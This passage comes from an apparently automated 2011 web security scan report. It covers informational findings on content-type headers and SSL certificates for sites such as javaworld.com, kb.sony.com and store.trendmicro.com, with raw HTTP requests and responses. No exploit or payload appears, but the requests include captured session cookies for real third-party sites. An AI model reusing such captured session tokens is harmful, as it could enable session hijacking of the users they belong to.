Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:52 GMT
Content-Length: 1046

.PNG
.
...IHDR.............a.......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...@.9<.6=.6...............C.=J.D......A.;s.o{.wA.:7.0;.4p.kH.A.........b.^e.a...Q.K..
...[SNIP]...

20.6. http://www.javaworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.javaworld.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=50.23.123.106.1315331151623899; CP=null*; __utma=51115954.1360305783.1315349155.1315349155.1315349155.1; __utmb=51115954.1.10.1315349155; __utmc=51115954; __utmz=51115954.1315349155.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=acegisecurity; __switchTo5x=31; __unam=80e81ea-13240eb6f64-4c95886-1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:46:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Oct 2008 19:34:55 GMT
ETag: "73408d-47e-4584a4fb615c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

21. Content type is not specified  previous  next
There are 4 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


21.1. http://www.javalobby.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcalXcWOWKw_8jKx4-it; __utma=125574289.255423471.1315349166.1315349166.1315349166.1; __utmb=125574289; __utmc=125574289; __utmz=125574289.1315349166.1.1.utmccn=(organic)|utmcsr=google|utmctr=acegisecurity|utmcmd=organic; __qca=P0-26411862-1315349166480

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
ETag: "+Rv4b+Thyy2"
Last-Modified: Fri, 18 Feb 2005 16:02:25 GMT
Cache-Control: max-age=5
Expires: Tue, 06 Sep 2011 17:55:43 GMT
Content-Length: 1406
Date: Tue, 06 Sep 2011 17:55:38 GMT

..............h.......(....... ....................................N8..si..}b..tn..._...g...h...v.......................................................................................................
...[SNIP]...

21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1

Request

GET /Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353083271

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"574-1314988493617"
Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT
Content-Length: 574
Date: Tue, 06 Sep 2011 18:51:16 GMT

GIF89a.......DDD.rVw.....-s....y~r..q.>.KKK...spaf..Id...W....UG..L?u.!l....WVV..R)....p...........|..)........j..&....a,..w.._..HV..}.'fff...dmW......?.......P..{..^..r..x..6.iW.yH.....u.....M`..\bh.
...[SNIP]...

21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1

Request

GET /Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353081761

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"79-1314988493992"
Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT
Content-Length: 79
Date: Tue, 06 Sep 2011 18:51:15 GMT

GIF89a...................!.......,.......... ............s.M.| F.Y...m.......;

21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1

Request

GET /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353359592

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"74-1314988493664"
Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT
Content-Length: 74
Date: Tue, 06 Sep 2011 18:55:51 GMT

GIF89a.......DDD...!.......,..........!.......d.:..L.Q.m.......Y.U.:r5s..;

22. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



22.1. https://store.trendmicro.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  store.trendmicro.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Apr 10 18:00:00 GMT-06:00 2011
Valid to:  Tue Apr 10 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

22.2. https://www.ca.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ca.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Oct 11 18:00:00 GMT-06:00 2010
Valid to:  Wed Oct 12 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011.